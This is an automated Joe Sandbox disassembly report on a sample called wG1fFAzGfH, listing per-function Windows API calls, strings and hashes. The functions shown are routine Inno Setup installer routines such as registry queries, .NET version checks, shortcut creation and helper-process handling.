Instruction ID: 9fa33364040fb067cffbf7544db289955a363cad08101e599f84dfab4c508334
Opcode Fuzzy Hash: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
Instruction Fuzzy Hash: D7916370A042059FDB10EBA9D845B9EB7B5EB08305F10857BE814EB383DB789948CF69

Function 0041F128 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F

Strings

Ctl3dAutoSubclass, xrefs: 0041F223
Ctl3dSubclassDlgEx, xrefs: 0041F1E4
Ctl3dCtlColorEx, xrefs: 0041F20E
Ctl3dRegister, xrefs: 0041F191
BtnWndProc3d, xrefs: 0041F262
CTL3D32.DLL, xrefs: 0041F159
Ctl3dUnAutoSubclass, xrefs: 0041F238
Ctl3DColorChange, xrefs: 0041F24D
Ctl3dDlgFramePaint, xrefs: 0041F1F9
Ctl3dSubclassCtl, xrefs: 0041F1CF
Ctl3dUnregister, xrefs: 0041F1BA

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
API String ID: 2323315520-3614243559
Opcode ID: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
Instruction ID: cf5be9d6f1a649145535b6a7131e14805afeac8bde6fe10f2a473d18be96f611
Opcode Fuzzy Hash: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
Instruction Fuzzy Hash: D63110B1640700EBDF00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D

Function 0041CA1C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON

Download Yara Rule

APIs

73E9A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
73EA4C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
73EA6180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
73EA4C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
73EA4C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
73E98830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
73E922A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
73EA4D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
SelectObject.GDI32(00000000,?), ref: 0041CBFE
DeleteDC.GDI32(00000000), ref: 0041CC14

Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Color$ObjectSelect$E922E98830Text$A570A6180DeleteFillRect
String ID:
API String ID: 1952589944-0
Opcode ID: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
Opcode Fuzzy Hash: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68

Function 00496894 Relevance: 28.3, APIs: 7, Strings: 9, Instructions: 251synchronizationCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000,00496FED,?,00000000), ref: 00496917
CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000), ref: 0049692A
ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000), ref: 0049693A
MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0049695B
ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000), ref: 0049696B

Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D

Strings

$pI, xrefs: 004969A5, 004969B2, 00496BAD, 00496A03
.lst, xrefs: 004969A8
/REGU, xrefs: 004968ED
Setup, xrefs: 00496903
oI, xrefs: 00496C1E
.msg, xrefs: 0049698E
Inno-Setup-RegSvr-Mutex, xrefs: 00496921
oI, xrefs: 004968B9, 004968C6, 004968DD, 004968EA, 0049697E, 00496988, 00496998, 004969A2
/REG, xrefs: 004968C9

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
API String ID: 2000705611-3392794427
Opcode ID: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
Instruction ID: 31cdb79ee62171b288e36ce2cb74f04ee829b5848567b5503989d80848a91494
Opcode Fuzzy Hash: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
Instruction Fuzzy Hash: 1191D530A04255AFDF11EBA5C852BAF7FA4EB49304F528477F500AB2C2D67DAC05CB69

Function 00459DF8 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,0045A0B4,?,?,?,?,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 00459F66

Strings

The file appears to be in use (%d). Will delete on restart., xrefs: 00459FAF
.fts, xrefs: 00459E6C
.hlp, xrefs: 00459E2F
.chm, xrefs: 00459E94
Deleting file: %s, xrefs: 00459F05
.gid, xrefs: 00459E48
.chw, xrefs: 00459EAD
Stripped read-only attribute., xrefs: 00459F3F
Failed to strip read-only attribute., xrefs: 00459F4B
Failed to delete the file; it may be in use (%d)., xrefs: 0045A055
.lnk, xrefs: 00459ED3

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLast
String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
API String ID: 1452528299-3112430753
Opcode ID: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
Instruction ID: 69f6fbefbe6f055fc938da3b3950c8fb4cadcfc16d4dd4dc981ad9326b9f7ff7
Opcode Fuzzy Hash: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
Instruction Fuzzy Hash: 5D71B130B102049BCB00EF6998827AE77A5AF49716F50856BFC05DB383DB7C9E4D875A

Function 0045C2E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 0045C2FA
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C31A
GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C327
GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C334
GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C342

Part of subcall function 0045C1E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C287,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C261

AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C3FB
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C404

Strings

advapi32.dll, xrefs: 0045C315
GetNamedSecurityInfoW, xrefs: 0045C321
W, xrefs: 0045C412
SetNamedSecurityInfoW, xrefs: 0045C32E
SetEntriesInAclW, xrefs: 0045C33C

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
API String ID: 59345061-4263478283
Opcode ID: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
Instruction ID: 8ce8c74b38915e38562a90fe4681b9431f62f8b5bebe6c1e41ffef27034fd0c0
Opcode Fuzzy Hash: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
Instruction Fuzzy Hash: DF5163B1900708EFDB10DFD9C881BAEB7B8EB4D711F14806AF905B7241D678A945CFA9

Function 0041B3BC Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON

Download Yara Rule

APIs

73EA4C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
73EA4C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
73EA6180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
73E9A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
73EA4C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
73E9A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
SelectObject.GDI32(00000000,?), ref: 0041B480
SelectObject.GDI32(?,00000000), ref: 0041B48F
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
SelectObject.GDI32(?,00000000), ref: 0041B4D7
DeleteDC.GDI32(00000000), ref: 0041B4E0
DeleteDC.GDI32(?), ref: 0041B4E9

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Object$Select$Delete$A480A570A6180Stretch
String ID:
API String ID: 1888863034-0
Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4

Function 00471AE8 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 333COMMON

Download Yara Rule

APIs

Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471CA0
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471D9F
SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471DB5
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471DDA

Strings

.pif, xrefs: 00471B97, 00471D23
target.lnk, xrefs: 00471E24
.url, xrefs: 00471BBA
.lnk, xrefs: 00471B74
{group}\, xrefs: 00471B42
Desktop.ini, xrefs: 00471E5B
Filename: %s, xrefs: 00471C42

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
API String ID: 971782779-3668018701
Opcode ID: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
Instruction ID: db08b3a78c5346aa08fc53deac37c7c900aaeab2e7ee66e1d047288e3336f214
Opcode Fuzzy Hash: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
Instruction Fuzzy Hash: 55D11374A00149AFDB11EFA9D882BDDB7F5AF48304F50806AF804B7391D778AE45CB69

Function 00453D90 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,?,00000000,?,00000000,00454029,?,0045A28A,00000003,00000000,00000000,00454060), ref: 00453EA9

Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B

RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F2D
RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F5C

Strings

Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DC7
RegOpenKeyEx, xrefs: 00453E2C
, xrefs: 00453E1A
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E00

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: QueryValue$FormatMessageOpen
String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2812809588-1577016196
Opcode ID: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
Instruction ID: 0c0f272a557b88975729148cb7875cb844f630b1a696a545db65abb6b51d3efb
Opcode Fuzzy Hash: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
Instruction Fuzzy Hash: 9D912271E04208ABDB11DF95D942BDEB7F8EB48745F10406BF901FB282D6789E09CB69

Function 00458B78 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00458A84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C1F
RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C89

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458CF0

Strings

.NET Framework not found, xrefs: 00458D3D
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458BD2
v1.1.4322, xrefs: 00458CE2
v4.0.30319, xrefs: 00458C11
.NET Framework version %s not found, xrefs: 00458D29
v2.0.50727, xrefs: 00458C7B
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458CA3
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458C3C

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Close$Open
String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
API String ID: 2976201327-446240816
Opcode ID: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
Instruction ID: 32352305a0336a12336774107b7ff5a8d04594bb7e4f1119dbb0a5d8803071dd
Opcode Fuzzy Hash: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
Instruction Fuzzy Hash: 7351D430A041485BCB00DB65C861BEE77B6DB99305F14447FE941EB393DF399A0E8B69

Function 00458164 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0045819B
TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004581B7
WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004581C5
GetExitCodeProcess.KERNEL32(?), ref: 004581D6
CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045821D
Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458239

Strings

Stopping 64-bit helper process. (PID: %u), xrefs: 0045818D
Helper process exited with failure code: 0x%x, xrefs: 00458203
Helper process exited., xrefs: 004581E5
Helper process exited, but failed to get exit code., xrefs: 0045820F
Helper isn't responding; killing it., xrefs: 004581A7

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
API String ID: 3355656108-1243109208
Opcode ID: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
Instruction ID: ca0659a1f7dd3987533feb970b51f52a81168d3092bf9212e29b303cc353bad7
Opcode Fuzzy Hash: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
Instruction Fuzzy Hash: 79217170604B409AD720E7B9C44574B7AD49F49305F048C6FF99AEB293DE78E8488B2A

Function 00453A44 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453B6B
RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453CA7

Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B

Strings

RegCreateKeyEx, xrefs: 00453ADF
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A83
, xrefs: 00453ACD
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AB3

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseCreateFormatMessageQueryValue
